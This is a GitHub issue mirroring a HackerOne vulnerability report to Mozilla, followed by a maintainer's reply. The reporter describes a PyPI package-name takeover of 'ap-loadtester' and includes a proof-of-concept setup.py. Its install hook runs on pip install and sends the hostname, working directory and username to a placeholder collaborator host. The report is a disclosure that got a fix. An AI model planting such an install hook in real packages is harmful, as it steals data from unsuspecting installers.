Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

code injection through pip #418

Open
data-sync-user opened this issue Aug 7, 2023 · 1 comment
Open

code injection through pip #418

data-sync-user opened this issue Aug 7, 2023 · 1 comment
Labels
nosync Keep this issue local to github

Comments

@data-sync-user
Copy link
Collaborator

HackerOne Report: https://hackerone.com/reports/2097694
Report Date: 2023-08-05 17:06:15 UTC
Reporter: anupamas01
Weakness: Code Injection

Initial Report:
{panel}

Summary:

hello team,
I found a pip package by which I can run malicious commands.

Steps To Reproduce:

[add details for how we can reproduce the issue]

  1. go to https://github.com/mozilla-services/autopush-loadtester
    ( as it is highly been used i have not uploaded a higher version which may affect the production)
  2. you can see $ pip install ap-loadtester, you can see I have taken it over https://pypi.org/project/ap-loadtester/
    (in Maintainers)\ when you install it, it will install my pip package

POC

https://pypi.org/project/ap-loadtester/

( right now I am not uploading any code , if program allows i will upload )

from setuptools.command.install import install
import requests
import socket
import getpass
import os
class CustomInstall(install):
    def run(self):
        install.run(self)
        hostname=socket.gethostname()
        cwd = os.getcwd()
        username = getpass.getuser()
        ploads = {'hostname':hostname,'cwd':cwd,'username':username}
        requests.get("[https://burpcollaborator.net",params](https://burpcollaborator.net",params)
 = ploads) #replace burpcollaborator.net with Interactsh or pipedream
setup(name=ap-loadtester, #package name
      version='1.0.0',
      description='test',
      author='test',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

POC

https://pypi.org/project/ap-loadtester/

Impact

code injection through the pip package

thanks
AnupamAs01


{panel}



┆Issue is synchronized with this [Jira Bug](https://mozilla-hub.atlassian.net/browse/SYNC-3860)
┆Attachments: <a href="https://mozilla-hub.atlassian.net/rest/api/2/attachment/content/40617">[F2576644] image.png</a>
@data-sync-user data-sync-user added the nosync Keep this issue local to github label Aug 7, 2023
@jrconlin
Copy link
Member

jrconlin commented Aug 7, 2023
edited

Thank you for reporting this!

The repo you site autopush-loadtester is a very old test script for the original autopush repo which has been replaced by this repo. It was never meant to be installed by pip (and clearly so, because the setup.py would have created a different named repo anyway. 🤦🏻‍♂️ )
I've corrected the README on the autopush-loadtester repo to remove references to ap-loadtester, as well as archived the repo.

Clearly, there are a lot of old bits and pieces lying around that have not yet been cleaned up properly. Thank you for helping us find one.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
nosync Keep this issue local to github
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@jrconlin @data-sync-user